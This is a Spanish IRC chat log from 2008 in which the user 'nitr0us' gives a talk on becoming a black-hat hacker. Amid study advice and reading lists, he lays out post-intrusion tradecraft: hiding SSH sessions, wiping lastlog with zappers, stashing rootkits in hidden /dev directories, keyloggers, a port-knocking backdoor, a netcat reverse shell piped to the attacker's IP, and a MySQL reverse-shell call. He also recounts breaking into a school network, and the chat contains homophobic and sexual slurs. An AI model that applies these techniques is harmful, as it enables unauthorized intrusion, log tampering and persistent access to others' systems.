CHARLA EN IRC RTM - How to become a 1337 hax0r fux0r

---------------------------------------------------------[ How to become a 1337 hax0r fux0r ]---------------------------------------------------
13-12-08 - servidor irc: irc.zonartm.org #rtm ------------------------------------------------------------------------------------ www.zonartm.org

(06:40:00) nitr0us: ahora si
(06:40:02) nitr0us: Padrinos !!!!
(06:40:07) vendetta: nitr0us: quieres que modere el canal??
(06:40:11) nitr0us: vendetta: no no
(06:40:14) nitr0us: no me gusta moderado
(06:40:17) vendetta: oks!
(06:40:18) nitr0us: me sentiría como un robot
(06:40:39) nitr0us: q sería cool
(06:40:42) nitr0us: pero x ahora no quiero nada cyborg
(06:40:43) nitr0us: bueno, yo solo quiero dar unos tips
(06:40:53) nitr0us: tricks o algunas cosas
(06:41:00) nitr0us: de la old school
(06:41:09) nitr0us: black hat tricks y cosillas medio v00d00s
(06:41:22) nitr0us: quizás muchos ya sepan estos tricks, pero muchos no, q es lo q me interesa q aprendan
(06:41:46) nitr0us: (disculpmen mi otrografía, pero tengo 17% d alcohol dentro.. de una botella de 750ml)
(06:42:06) nitr0us: cuando ustedes ownean un server
(06:42:11) nitr0us: sacan login passw0rd
(06:42:12) nitr0us: ok, NO SE CONECTEN DIRECTAMENTE DESDE SSH
(06:42:22) nitr0us: asi tal cual
(06:42:26) nitr0us: yo siempre hago algo llamado
(06:42:32) nitr0us: unallocated TTY
(06:42:35) nitr0us: q es esto:
(06:43:06) nitr0us: ssh -T user@host /bin/bash -i
(06:43:17) nitr0us: si ustedes se conectan así por SSH
(06:43:25) nitr0us: no allocatean una TTY
(06:43:29) nitr0us: y por consiguiente
(06:43:30) nitr0us: si hacen
(06:43:34) nitr0us: $w o $who
(06:43:39) nitr0us: no aparecerán en la lista
(06:43:47) nitr0us: esto es parte del diseño, no es un fallo ni nada
(06:43:51) nitr0us: solamente es CONOCIMIENTO
(06:43:56) nitr0us: conocimiento de ese feature de SSH
(06:44:11) ***ksaver entrando en arbornet.org via ssh -T user@host /bin/bash -i
(06:44:25) nitr0us: pero si no, pues usen el l33t way... modifiquen el archivo lastlog, con algún zapper.. recomiendo
------------------------ mmm dejen ver mis zappers q se me olvidó el nombre XD
(06:44:37) nitr0us: uzapper
(06:44:39) nitr0us: y zap3
(06:44:41) nitr0us: son .c los 2
(06:44:46) nitr0us: packetstormsecurity
(06:45:03) nitr0us: ahorita ando quieriendo hacer un zapper para openbsd... ya q no hay actuales (los viejos crasheban)
(06:45:09) nitr0us: bueno, con eso toman las estructuras de datos de lastlog
(06:45:35) nitr0us: y al momoento d ejecutar el zapper con privilegios suficientes (w00t /o/)
(06:45:35) nitr0us: pues se boorran los registros
(06:45:44) nitr0us: y al hacer $w o $who
(06:45:48) nitr0us: ya no salen como conectados
(06:46:02) nitr0us: mmm ... si van a ownear
(06:46:20) nitr0us: a /tmp
(06:46:24) nitr0us: y si tienen r00t
(06:46:28) nitr0us: entren a /dev
(06:46:38) nitr0us: nadie entra a dev.. eso ya es parte de tactical exploitation
(06:46:52) nitr0us: entren a dev o a cualquier dir... y creen archivos empezando por . (punto)
(06:46:58) nitr0us: q no sale con un simple $ls -l
(06:47:09) nitr0us: yo x lo regular entro a /dev
(06:47:10) nitr0us: y ahi hago
(06:47:16) nitr0us: #mkdir ".. "
(06:47:24) nitr0us: dos puntos y espacio
(06:47:29) nitr0us: entonces al hacer $ls -la
(06:47:32) nitr0us: sale :
(06:47:46) nitr0us: .
(06:47:47) nitr0us: ..
(06:47:47) nitr0us: ..ñ
(06:47:47) nitr0us: fuck... whatever... para entrar $cd "/dev/.. "
(06:48:01) nitr0us: es algo ofuscado... (IN) Securitiy through fscking ! obscurity
(06:48:06) nitr0us: ahi cargan sus exploits
(06:48:14) nitr0us: r00tkits.. lo q quieran
(06:48:18) nitr0us: x cierto, siempre he usado LKL
(06:48:24) nitr0us: un keylogger d linux
(06:48:39) nitr0us: poca madre... hijackea la interrupción de hardware.. no recuerdo si es la 0x60
(06:48:47) nitr0us: dsd hace 5 años he venido usando LKL
(06:48:50) nitr0us: y me funciona d poca madre
(06:49:08) nitr0us: si quieren usar backd00rs
(06:49:11) nitr0us: no usen un puto
(06:49:20) nitr0us: socket(), bind(), listen(), accept()
(06:49:22) nitr0us: ya es lame eso
(06:49:26) nitr0us: cualquier n00b sysadmin
(06:49:28) nitr0us: hace $netstat -ant
(06:49:33) nitr0us: y ve su pinche puerto 31337 a la escucha
(06:49:35) nitr0us: y se chingaron
(06:49:40) Psymera: xD
(06:50:21) nitr0us: (nota para BOFHs (Bastard Operator From Hell {aka sysadmins}) .. netstat -ant -p) t muestra el pid..
------------------------ osea el process id q atiende dicha stack TCP/IP)
(06:50:28) nitr0us: ok... no usen pinches binds
(06:50:28) crypkey: bind() xD
(06:50:33) nitr0us: usen un troyano q yo hice
(06:50:34) nitr0us: XD
(06:50:38) nitr0us: válgase el comercial
(06:50:39) nitr0us: se llama
(06:50:41) nitr0us: KNOCK-OUT
(06:50:49) nitr0us: es un backd00r
(06:50:51) Psymera: y lo pueden pedir por solo 9.95 xP
(06:51:00) nitr0us: pero q usa
(06:51:04) vendetta: nitr0us: url??
(06:51:08) nitr0us: port-knocking t3chn1qu3z
(06:51:49) nitr0us: http://packetstormsecurity.org/UNIX/scanners/knock-out.tar.gz
(06:51:50) nitr0us: ahi ta
(06:51:52) nitr0us: knock-out
(06:51:53) nitr0us: .tar.gz
(06:52:05) nitr0us: bueno, no se por q esos putos lo pusieron en scanner XD
(06:52:08) nitr0us: es un backd00r
(06:52:14) vendetta: nitr0us: oks!.. pa subirlo a la web con el log ;)
(06:52:17) nitr0us: knock-out is a remote administration tool using port-knocking techniques. It supports both UDP
------------------------ and TCP transmission and is customizable. It allows both bind ports and reverse shells. Note
------------------------ that all documentation, etc, is written in Spanish.
(06:52:20) nitr0us: y está en español, en si ese backd00r lo q hace es
(06:52:30) nitr0us: escuchar en modo pasivo
(06:52:47) nitr0us: es decir... no pone un puerto a la escucha ( q el kernel o core del sistema operativo, notará..)
(06:53:04) nitr0us: sino q ... pone un PROCESO, a la escucha, .. modo promiscuo en la tarjeta de red especificada...
(06:53:09) nitr0us: y el atacante pone un patron
(06:53:36) nitr0us: digamos .. yo como antacante digo MIRA... QUIERO Q CUANDO TOQUEN EL PUERTO 1 ... LUEGO EL 10..
------------------------ Y LUEGO 10000 .. 5 SEGUNDOS ENTRE ELLOS, SIGNIFICA Q es valido
(06:53:38) nitr0us: y le doy acceso
(06:53:54) nitr0us: eso es.. entonces mi backd00r es cliente / servidor.. ambos usan el mismo archivo d configuración
(06:53:58) nitr0us: pero bueno... ahi lo prueban
(06:54:09) nitr0us: q más q más... mmm aprendan C
(06:54:11) nitr0us: aprendan ASM
(06:54:16) nitr0us: aprendan un pinche int $0x80
(06:54:30) nitr0us: entenderán más la arquitectura Von Neumman..
(06:54:45) nitr0us: si, ese libro es la onda
(06:55:10) nitr0us: aprendan lo q son estructuras de datos
(06:55:12) nitr0us: por q así como ustedes dicen
(06:55:20) nitr0us: AHH PINCHES PROFESORES... ESO Q PUTAS ME VA A SERVIR EN LA VIDA REAL
(06:55:25) nitr0us: nel, aprendan estructuras de datos
(06:55:29) nitr0us: aprendan lo q es una pila (stack)(
(06:55:33) nitr0us: lo q es un heap
(06:55:37) nitr0us: lo q es una LISTA LIGADA !!
(06:55:40) nitr0us: los heap overflows
(06:55:59) crypkey: FX heap exploitaton style
(06:56:05) nitr0us: son listas ligadas... punteros d una estructura a otra... de HEAP CHUNKS
(06:56:20) nitr0us: crypkey: si, aunq en general hay muchas cosas relacionadas con estructuras de datos
(06:56:26) nitr0us: no por nada lo enseñan
(06:56:29) nitr0us: la ciencia es ciencia
(06:56:32) nitr0us: y he ahi lo chingón
(06:56:34) nitr0us: cualquier wey ahorita
(06:56:39) nitr0us: podría explotar un 0verflow
(06:56:46) nitr0us: pero si lo pasas a otra arquitectura
(06:56:47) nitr0us: se las pela
(06:56:52) nitr0us: necesitamos saber EL ENTORNO
(06:57:04) nitr0us: si conocemos el entorno, conocemos q variables modificar
(06:57:05) sthk: que textos recomiendas?
(06:57:22) nitr0us: sthk: nowadays... recomiendo papers de RISE Security
(06:57:32) nitr0us: advisorys de BSDaemon (Rubira Branco)
(06:57:40) nitr0us: mmm todo lo q tnga q ver con Phenoelit FX
(06:57:45) nitr0us: hacking de wetware
(06:57:49) sthk: nitr0us, chingon
(06:57:55) nitr0us: mmmmm bueno, si me meto a pedos cyberpunks no termino hoy.. toda la madrugada
(06:58:08) nitr0us: lean papers sobre hacking del ser humano
(06:58:13) nitr0us: yo en eso ando últimamente
(06:58:14) nitr0us: se llama WETWARE HACKING
06:58:41) nitr0us: lean lo q son las BMI (Brain Machine Interface)
(06:58:50) nitr0us: los q no vieron Jhonny Mnemonic se lo perdieron..
(06:59:05) nitr0us: bueno, en cuestión técnica.... aprendan C !! d nuevo
(06:59:06) nitr0us: si saben C cuando aprendan perl o PHP
(06:59:15) nitr0us: se les hará cagado d risa
(06:59:37) nitr0us: aprendan, AUTOMATAS
(06:59:42) nitr0us: teoría d autómatas, rula !!
(06:59:48) nitr0us: GRAMATICAS
(06:59:54) nitr0us: cuando ustedes entienden matemáticas
07:00:07) nitr0us: la arman... teoría de grafos.. mmm aplicado a la realidad
(07:00:13) nitr0us: ubican Spylabs ??
(07:00:17) nitr0us: los weyes q hacen BinDiff
(07:00:38) nitr0us: BinDiff... cualquier pinche reverse engineer sabe lo q es bindiff
(07:00:47) nitr0us: ok, bindiff es una app q utiliza teoría de grafos
(07:00:52) nitr0us: mmm otro ejemplo Immunity Debugger...
(07:01:20) nitr0us: para hacer disassembly.. se utiliza algo llamado DEAD CODE
(07:01:30) nitr0us: elcual se genera utilizando teoría de grafos
(07:01:48) nitr0us: aprendan teoría fractal.. teoría del caos.. pRNG (pseudo Random Number Generators)
(07:01:59) nitr0us: y entiendan el famoso bug de OpenSSL en Debian
(07:02:02) Crypkey: Ejemplo de PRNG, wesside-ng
(07:02:05) nitr0us: por q se podìa chingar Diffie-Hellman
(07:02:25) nitr0us: por q en criptografía la entropía es super importante
(07:02:41) nitr0us: por q creen q cuando instalan soft. criptográfico.. al momento d generar BIGNUMs les dice
(07:02:54) nitr0us: MUEVE EL MOUSE BIEN PARA Q YO CREE ALGO BIEN CHINGON Y TU ESTES MAS SEGURO DE LO NORMAL JIJIJI !
(07:02:57) nitr0us: por eso mismo..
(07:06:17) modo (+o nitr0us1) por nediam
(07:06:22) nitr0us1: les decía
(07:06:28) nitr0us1: q cuando su soft. de criptografía les dice
(07:06:37) nitr0us1: HABER JOTIN !, TU LO UNICO Q SABES HACER ES MOVER EL MOUSE
(07:06:42) nitr0us1: PARA QUE YO LLENE EL SPOOL
(07:06:47) nitr0us1: DE ENTROPIA
(07:06:48) nitr0us1: y tal cual
(07:06:53) nitr0us1: uno mueve el mouse bien chingón !!!
(07:07:04) nitr0us1: pero en si, chekenlo en su kernel
(07:07:06) nitr0us1: en /proc
(07:07:09) nitr0us1: hay un file
(07:07:13) nitr0us1: no recuerdo la ruta correcta
(07:07:18) nitr0us1: pero ahi ustedes tiene 2 archivos
(07:07:37) nitr0us1: uno q es el tamaño del pool de entropía q es 2048 bytes aprox... y pues el hardware va creando esto..
(07:07:43) nitr0us1: entonces mmmm cambiando d tema al mismo tiempo
(07:07:46) nitr0us1: si requieren datos
(07:07:50) nitr0us1: random
(07:07:55) nitr0us1: usen /dev/random
(07:08:19) nitr0us1: eso les dará un dato RANDOM realmente.. lo q hay en el spool de entropía
(07:08:36) nitr0us1: si quieren datos medio random.. mientras se va llenando la pooll... y mientras se llena lo va poniendo
(07:08:39) nitr0us1: usen /dev/urandom
(07:08:39) nitr0us1: pero bueno
(07:08:43) nitr0us1: ok q más puedo decirles
(07:08:46) nediam: nitr0us: /proc/sys/kernel/random/poolsize
(07:08:54) nitr0us1: nediam: eso mero karnal
(07:09:06) nitr0us1: aprendan a usar los recursos q les da el sistema operativo para h4x0ring
(07:09:07) nitr0us1: para pwning
(07:09:13) nitr0us1: cuando yo empezé con esto
(07:09:19) nitr0us1: creía q TELNET era una herramienta h4x0ril !
(07:09:21) nitr0us1: no, luego t das cuenta q es un cliente universal para TCP...
(07:09:51) nitr0us1: aunque prefiero netcat (no envia datos que telnet si ;) y te puede joder la backd00r)
(07:10:02) nitr0us1: bueno, aprendan a usar los recursos de un sistema operativo
(07:10:03) nitr0us1: como los PIPEs
(07:10:40) nitr0us1: los pipes son el famoso caracter |
(07:10:42) nitr0us1: como anecdota
(07:10:45) nitr0us1: hace unos años
(07:10:52) nitr0us1: cuando era de zonaRTM
(07:10:58) nitr0us1: en el team estaba con Benn
(07:11:16) nitr0us1: un día.. Benn y yo nos pùsimos a pwnear una red escolar...
(07:11:36) nitr0us1: los weyes d la escuela daban acceso a shell dsd PHP Shell... tenias una interfaz mamona dsd Web
(07:11:43) nitr0us1: entonces... usando Netcat y pipes puedes hacer magia
(07:12:14) nitr0us1: sabiendo redireccionar datos através del sistema operativo la haces
(07:12:21) nitr0us1: x ejemplo hice nc -l -p 25 -vv
(07:12:33) nitr0us1: en una terminal
(07:12:43) nitr0us1: y en otra terminal lo mismo pero con puerto 80
(07:12:52) nitr0us1: eso es usando puertos estandars para evadir firewalls
(07:13:02) nitr0us1: entonces... ya dsd php shell... hice algo como
(07:13:17) nitr0us1: $nc IP_nitr0us 25 | /bin/sh | nc IP_nitr0us 80
(07:13:53) nitr0us1: usando pipes =) jeje q el OS t brinda... pasas datos dsd STOUT... a STDIN de /bin/sh...
-------------------------- lo cual genera un STDOUT que te lo manda por pipe al puerto 80 d nitr0us
(07:14:08) nitr0us1: esto es q yo como atacante... dsd mi puerto 25 abierto.. metía los comandos.... y los recibí
-------------------------- en el puerto 80 de mi misma máquina =)
(07:14:24) nitr0us1: aprendan a troyanizar software también
(07:14:33) nitr0us1: no solo los clásicos REVERSE SHELLS.. o BIND SHELLs
(07:14:43) nitr0us1: si a alguien le interesa les puedo pasar badkc00'rs interesantes
(07:14:52) nitr0us1: pero no ahorita... luego jaja q ahoriga ando high
(07:15:01) nitr0us1: backd00rs dsd BIND
(07:15:08) nitr0us1: q con nslookup t da remote r00t
(07:15:21) nitr0us1: mod_r00tme ... q fué el q usamos con Benn cuando eramos de zonartm
(07:15:33) nitr0us1: una backd00r d winamp jeje q t hace un listen()
(07:15:35) nitr0us1: dsd una .dll
(07:15:47) crypkey: aah mod_r00me jaja.
(07:15:49) nitr0us1: una q me gusta mucho es la de un italiano
(07:15:56) nitr0us1: 0xdeadbeef.info
(07:16:15) nitr0us1: es un wey llamado raptor
(07:16:20) nitr0us1: es una backd00r d MySQL
(07:16:22) nitr0us1: bajo win y linux
(07:16:24) nitr0us1: lo he probado en ambos
(07:16:27) nitr0us1: y rula d poca madre
(07:16:31) crypkey: Raptor hdspm.
(07:16:31) nitr0us1: solamente haces algo como
(07:16:58) nitr0us1: >select nc('x.x.x.x'. '31337');
(07:17:07) nitr0us1: y t da reverse shell a ese puerto d esa ip x.x.x.x
(07:17:17) nitr0us1: esa es mi recomendación
(07:17:25) nitr0us1: no solamente LEER HOW-TO HACK A GAY WITH ONE TESTICLE
(07:17:41) nitr0us1: o los HOW TO KILL A FSCICK GAY LIKE crypkey WITH ONE LADATEL CARD !
(07:17:51) nitr0us1: o los HOW TO FUCK A LOLITA IN LESS THAN 3 HOURS BY nediam
(07:18:00) nitr0us1: no leer puros putos how-tos
(07:18:03) nitr0us1: q sino no avanzamos
(07:18:05) nitr0us1: hay q leer PHRACK
(07:18:09) nitr0us1: hay q leer SISTEMAS OPERATIVOS
(07:18:21) nitr0us1: entender q hace el POST (Power On Self Test)
(07:18:41) nitr0us1: cuando prendes tu máquina.. t has preguntado, como la energía fluye y hace q el OS se cargue ? ;)
(07:18:55) nitr0us1: por q en el MBR (Master Boot fscing Record !! ) es d 512 bytes
(07:19:00) nitr0us1: y com es que se carga en memoria
(07:19:04) nitr0us1: y como ese cachito salta al kernel
(07:19:30) nitr0us1: todo eso.. aprendan UNIX
(07:19:32) nitr0us1: siempr he dicho UNIX, asm
(07:19:37) nitr0us1: si saben asm muevanse a otras arquitecutras como SPARC
(07:20:20) Psymera: y bien alguien es bueno en sql inyeccions aki? xP
(07:20:25) nitr0us1: pero bueno
(07:20:32) nitr0us1: Psymera: sql injections ejejej hablando d eso
(07:20:34) nitr0us1: recomiendo mucho
(07:20:37) nitr0us1: una tool de un compa d spaña
(07:20:44) nitr0us1: mmm q no recuerdco como se llama jajaja
(07:20:51) nitr0us1: su nick es ka0x
(07:20:56) nitr0us1: tiene papers en milw0rm.com
(07:21:04) ksaver: que tal sqlninja?
(07:21:13) nitr0us1: para blind sqlinjections recomiendo mucho bfsql
(07:21:28) hkm:----- sqlmap es muy bueno tambien
(07:22:52) nitr0us1: mmm hablando de exploits
(07:22:55) nitr0us1: de black hat POWAA !!
(07:23:13) nitr0us1: bueno
(07:23:15) nitr0us1: exploiting
(07:23:22) nitr0us1: lean de Alexander Sotirov
(07:23:24) nitr0us1: aunque la otra vez
(07:23:34) nitr0us1: hablando con un compa (nahual) jaja concluimos que tiene rasgos gays
(07:23:37) nitr0us1: pero ese hijo d putaaa
(07:23:40) nitr0us1: no mammmmes !!!
(07:23:45) nitr0us1: hardc0re hacking
(07:24:17) nitr0us1: te habla del heap de windows como si estuviera hablando de como apagar tu maquina desde un
------------------------- acceso directo en windows 98.
(07:24:19) nitr0us1: (chiste local XD)
(07:24:28) nitr0us1: lean phrack
(07:24:33) nitr0us1: lean lo q es un ONE-SHOT-EXPLOIT
(07:24:39) nitr0us1: d hecho las compaññias de exploits
(07:24:40) nitr0us1: eso venden
(07:24:43) nitr0us1: Saint Exploit
(07:24:46) nitr0us1: Core Impact
(07:24:53) nitr0us1: etc etc etc...
(07:25:00) nitr0us1: muchos d los exploits q venden son one-shot
(07:25:02) nitr0us1: por que ???
(07:25:25) nitr0us1: por q no pueden vender productos COMERCIALES !! si el exploit va a crashear el server en
-------------------- producción q t dejará $$$$$$$$$ d perdidas
(07:26:25) nitr0us1: ahora
(07:26:29) nitr0us1: hablando d desmadres BLACK HAT
(07:26:31) nitr0us1: lean lo q es m00 security
(07:26:36) nitr0us1: GOBBLES !!!
(07:26:44) crypkey: uhh gobbles...
(07:26:57) nitr0us1: los weyes de mmmm the circle of lost hackers
(07:27:08) nitr0us1: last stage of delirium !
(07:27:10) nitr0us1: eso es hacking !!
(07:27:17) nitr0us1: los wyes de LSD
(07:27:23) nitr0us1: mmm q más... las viejas de l0t3k
(07:27:26) nitr0us1: (francesas)
(07:27:30) nitr0us1: mixter !!!!!!!!!!!!
(07:27:35) nitr0us1: ese hijo d putaaaa... pinche rusoo !!
(07:27:37) crypkey: uhhh mixter..
(07:27:37) nitr0us1: no mamar
(07:27:44) nitr0us1: d mixter aprendí sockets !!!
(07:27:45) nediam:- jajaja las presentaciones de gobbles rulz
(07:27:57) nitr0us1: si, googleen GOBBLES.avi
(07:28:01) nitr0us1: saldrá un video de defcon
(07:28:26) nitr0us1: de GOBBLES junto con Silvio Cesare (el rey del malware en UNIX) .. d dnd he tomado parte d mi inspiración para
-------------------------- hacer research de ELF hacking.
(07:28:32) nitr0us1: y sale con the UNIX Terrorist
(07:29:05) vircob:---http://www.def-con.org/media/gobbles.avi
(07:29:28) nitr0us1: the UNIX Terrorists es un wey
(07:29:41) nitr0us1: todo flaco.. parece extraterrestre de Man In Black !!
(07:29:49) nitr0us1: pero leanse el profile d ese cabron !!!!
(07:30:03) nitr0us1: pinche wey degenerado
(07:30:06) nitr0us1: hacking hardc0re !!
(07:30:17) nitr0us1: el prifile de the_uT está en la última zine de PHRACK
(07:30:45) nitr0us1: ese wey consume Soga del muerto como lo conoce nediam
(07:30:46) nitr0us1: jeje aka DMA XD
(07:31:01) nitr0us1: busken.. GOBBLES.avi
(07:31:05) nitr0us1: en g-con
(07:31:06) nitr0us1: mexico
(07:31:20) nitr0us1: según se hizo pasar por Lance Spitzner (el wey de Honeynet project)
(07:31:22) nitr0us1: por que?
(07:31:24) nitr0us1: PARA MAMAR !! blackhat !!
(07:32:22) nitr0us1: ok q más puedo contarles... mmm tech stuff
(07:32:26) nitr0us1: literatura:
(07:32:32) nitr0us1: NEUROMANCER
(07:32:38) nitr0us1: la biblia de todo cyberpunk
(07:32:52) nitr0us1: Foundation de Isaac Asimov
(07:33:02) nitr0us1: películas mmm Johnny Mnemonic
(07:33:04) nediam: nitr0us: eip, estuvo cagadisimo.. fue en g-con 2
(07:33:09) nitr0us1: ahi vi las mejores interfaces hombre máquina
(07:33:30) nediam: pinche seriedad que le pon?a, que todo el mundo se la creyo :P
(07:34:13) nitr0us1: para quienes no conozcan a Gobbles
(07:34:15) nitr0us1: solamente busquen
(07:34:21) nitr0us1: apache-scalp.c
(07:34:35) nitr0us1: ese fué el primer exploit q usé dgobbles
(07:34:52) nitr0us1: otra cosa, lean sobre n3t-d3v... hubo un reto
(07:35:04) nitr0us1: d un científico q según descubrió q n3t-d3v era g0bbles
(07:35:17) nitr0us1: por q n3t-d3v era un ente q TIRABA MIERDA a la industria d la seguridad en mail lists
(07:35:33) nitr0us1: pero según ese wey, el científico .. n3t-d3v es GOBBLES...
(07:35:38) nitr0us1: usando profiling !!!
(07:35:51) nitr0us1: entonces GOBBLES retó a ese científico en defcon... para hacerse una prueba d polígrafo
(07:35:55) nitr0us1: jajaja pinches desmadres hackeriles
(07:37:01) nitr0us1: mmm q más... para mi últimamente es muy importante el NO-TECH-HACKING
(07:37:08) nitr0us1: utilizar inteligencia
(07:37:11) nitr0us1: contrainteligencia
(07:37:26) nitr0us1: si tienen oportunidad leánse el libro de El arte de la guerra
(07:37:31) Roa:------ ...http://www.hackerfactor.com/papers/who_is_n3td3v.pdf
(07:37:36) nitr0us1: aprender estrategias militares
(07:37:42) nitr0us1: Roa: tnx bro, ese mero
(07:37:48) nitr0us1: leanse ese pdf... poca madre
(07:37:50) nitr0us1: la investigación
(07:38:04) nitr0us1: hablando de investigación... aprendan.. aprendamos a redactar un buen paper
(07:38:06) nitr0us1: un paper científico
(07:38:16) nitr0us1: marco teórico.. como hacer las referencias
(07:38:22) nitr0us1: he visto papers MUY CAGADOS
(07:38:34) nitr0us1: q las referencias son solo [ 1] http:// eaeaeaea
(07:38:44) nitr0us1: no lo niego, yo tengo papers así pero INFORMALES
(07:38:47) nitr0us1: pero cuando son papers formales
(07:38:55) nitr0us1: aprendamos a redactar utilizando el formato de la APA
(07:39:13) nitr0us1: ahi luego les rolo el documento.. eso da profesionalismo y seriedad a temas de investigación
(07:39:18) nitr0us1: es lo q falta en méxico
(07:39:26) nitr0us1: research en seguridad e inseguridad
(07:40:56) nitr0us1: ksaver: C ... mmm muchos wyes me han dicho NO MAMES C PASO A LA HISTORIA
(07:41:05) nitr0us1: luego hay MUCHOS PENDEJOS DE gurpos de usuarios d linux
(07:41:10) nitr0us1: q se DESPEDORRAN hablando y alabando a Alan Cox
(07:41:22) nitr0us1: bla bla bla Stallman
(07:41:37) nitr0us1: y llegas y les preguntas... HABER PADRINO.. HAS LEIDO PARTE DEL KERNEL DE LINUX ??
(07:41:48) nitr0us1: y pues se cagan para adentro !!!
(07:41:55) nitr0us1: el kernel es algo muy abstracto
(07:42:04) nitr0us1: desde init() !!!
(07:42:13) nitr0us1: hasta el monento en q un proceso es cargado en memoria
(07:42:15) nitr0us1: otro pedo
(07:42:17) Psymera: si no mamen conosco un buen de weyes ke dicen el C y asm no sirve lo cool es lo .net
(07:42:30) ksaver: y java XD
(07:42:32) nitr0us1: se han preguntado por q en la mayoría d programas... la pila empieza en tal dirección
(07:42:33) nitr0us1: o hace años por q empezaba en 0xbffffff0 ??
(07:42:43) nitr0us1: ps en el kernel está !!!
(07:42:47) nitr0us1: bueno, estaba XD
(07:42:49) nitr0us1: hablando d kernel
(07:42:58) nitr0us1: los LKMs
(07:43:04) nitr0us1: patching de la tabla de syscalls
(07:43:24) nitr0us1: en un paper de BSDaemon (Rubira Branco) habla de como hacer patching de la syscall table
(07:43:27) nitr0us1: para clavar hookings
(07:43:28) nitr0us1: lo hice..
(07:43:29) nitr0us1: d webos
(07:43:31) nitr0us1: funcionaba
(07:43:40) nitr0us1: hijack de read(), write(), ...
(07:43:47) nitr0us1: a nivel OS.. o sea, q chingaban cualquier app
(07:45:12) nitr0us1: aprendan tácticas militares
(07:45:18) nitr0us1: el arte de la guerra.. ese libro rula
(07:46:16) nediam:- y organicen su tiempo
(07:46:19) nitr0us1: yep, organizen su tiempo
(07:46:25) nitr0us1: por q si quieren ser hackers
(07:46:29) nediam: aunque sea cuando vayan al baño llevense su librito o su lap para darle al autoestudio
(07:46:30) nitr0us1: necesitarán dias de 27 horas !!!
(07:47:03) nitr0us1: lean sobre reverse engineering
(07:47:06) nitr0us1: no no no.. no lean, ENTIENDAN
(07:47:09) nediam:-- y reduzcanse su pr0n and xbox|psp time
(07:47:16) nitr0us1: para quienes quieran moverle al reverse
(07:47:19) nitr0us1: les recomiendo mucho
(07:47:59) nitr0us1: para quienes les guste el reversee
(07:48:04) nitr0us1: usen IDA Pro hay un módulo llamado HexRays
(07:48:12) nitr0us1: uff entre la comunidad d reversers
(07:48:18) nitr0us1: es otro pedo ese puto module
(07:49:05) nediam: tambien para el reverse el ollydbg sta chingon
(07:49:33) nitr0us1: si, el olly dbg es la onda
(07:49:42) nitr0us1: aunq ya lo reemplazo
(07:49:45) nitr0us1: el immunity dbg
(07:49:49) nitr0us1: esta poca madre
(07:50:59) nitr0us1: ya suplió al olly.. es casi lo mismo
(07:51:01) nitr0us1: mismos shortcuts, para malware
(07:51:07) nitr0us1: ok, analisis en win32
(07:51:10) nitr0us1: yo uso wireshark ... process monitor.. process explorer... file mon.. reg mon...
(07:51:35) nitr0us1: netstat netstat -ano
(07:51:41) nitr0us1: XD aunq suene cagado así es
(07:51:49) nitr0us1: netstat -ano
(07:56:54) nitr0us1: entonces
(07:57:07) nitr0us1: si quieren ser hax0rs
(07:57:11) nitr0us1: no lean mierdas como
(07:57:18) nitr0us1: how to be a hacker in less than 10 days by crypkey
(07:57:25) nitr0us1: lean arquitectura de computadoras
(07:57:34) exakeaw: http://ladyada.net/make/simreader/make.html
(07:57:44) nitr0us1: no implica gran conocimiento
(07:57:46) nitr0us1: el defacing y en nuestro pais
(07:57:56) nitr0us1: es una lástima q mucha gente
(07:57:59) nitr0us1: se mueva al carding... y se creen blackhats
(07:58:10) nitr0us1: lean sobre la scene rusa
(07:58:11) KBrown: el defacing es un deporte muy pendejo.
(07:58:13) nitr0us1: la pinche mafia rusa
(07:58:18) nitr0us1: conectense con cabrones como m00
(07:58:23) nitr0us1: y ahi si serán blackats
(07:58:25) crypkey: KBrown, tu lo dijiste.. deporte muy pendejo..
(07:58:37) Psymera: no yo solo kiero ser defacero y salir en el 11 xD
(07:58:45) Roa: calmate redpoint xDD
(07:59:54) nitr0us1: ok otro pequeño trick
(08:00:00) nitr0us1: usen attrib, attrib le pones ciertos attributos al file
(08:00:13) nitr0us1: para q ni root puedo borrarlo
(08:00:20) nitr0us1: hagan los famosos
(08:00:23) nitr0us1: $sudo su -
(08:00:43) nitr0us1: para aquellos servers q tengan como política dejar hacer sudo a todos los users
(08:02:47) nitr0us1: aprendan todo tipo d vulnerabilidades
(08:02:52) nitr0us1: off-by-fucking-one
(08:02:56) nitr0us1: race-condition
(08:02:57) nitr0us1: integer overflows
(08:03:09) nitr0us1: hoy en día lo sintegers son más comunes q los b0fs h0fs ...
(08:03:15) nitr0us1: fallos de diseño
(08:03:26) nitr0us1: aprendan lo q es análisis y diseño de soft.
(08:03:34) nitr0us1: pasa saber hacer bien una auditoría
(08:05:39) KBrown: Los errores de diseño son los más chingones.
(08:06:02) KBrown: porque cuesta un huevo repararlos y eso mantiene abierta la ventana de atacabilidad por más tiempo.
(08:06:46) KBrown: El tiempo desde el 0hday hasta el parche es muchísimo mayor que con un off by one.
(08:06:50) nitr0us1: aunq hace poco hice research en format string bugs
(08:06:55) nitr0us1: pero en aplicaciones en perl
(08:07:02) nitr0us1: tomé una muestra de 20 softs
(08:07:11) nitr0us1: y nada, ya está cabrón encontrar bugs
(08:08:05) nitr0us1: les recomiendo mucho
(08:08:14) nitr0us1: leer las e-zines de h0no !!!
(08:08:21) nitr0us1: h0no rewlz !!!
(08:08:47) nitr0us1: aprender sobre espinaje
(08:08:50) nitr0us1: espionaje
(08:08:51) nitr0us1: ninjitsu
(08:08:57) Roa:------ http://exp.byhack.net/papers/92
(08:09:06) nitr0us1: lean la zine l8
(08:09:14) nitr0us1: si, están en inglés
(08:09:45) nitr0us1: lean h0no #3
(08:09:46) jimtron: alguien tiene el cartman t1g como chingo
(08:09:46) nitr0us1: p30pl3 0n th1z l1zt n33d 2 f34r.
(08:09:47) nitr0us1: th3z3 h1t l1zt b1tch3z c4nt h1d3 f0r3v3r. y0u b3tt3r fuck1ng
(08:09:47) nitr0us1: ch4ng3 y0ur n4m3z 4nd m0v3 t0 4fr1c4.. c4us3 _W3_ _W1LL_
(08:09:47) nitr0us1: _FUCK_ _Y0UR_ _B0XEZ_ _UP_!_!_!_
(08:09:59) nitr0us1: jimtron: no pendejo !
(08:10:04) nitr0us1: nadie tiene cartman t1g
(08:10:11) nitr0us1: sino toma el viejo y adaptalo ! :S
(08:10:14) nitr0us1: y deja de mamar
(08:10:19) nitr0us1: aprendan ASM
(08:10:20) crypkey: LoL
(08:10:23) nitr0us1: ASM PARA PIC !!
(08:10:28) nitr0us1: el codigo de Cartman
(08:10:34) nitr0us1: esta para un pic16f84a
(08:10:48) nitr0us1: PIC es la verga.. se pueden hacer cosas interesantes con microcontroladores
(08:10:53) nitr0us1: yo hice un caja de seguridad hace como 2 años
